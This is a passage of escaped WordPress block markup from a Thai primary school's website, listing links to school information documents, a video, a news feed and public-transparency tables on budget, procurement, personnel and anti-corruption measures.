href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 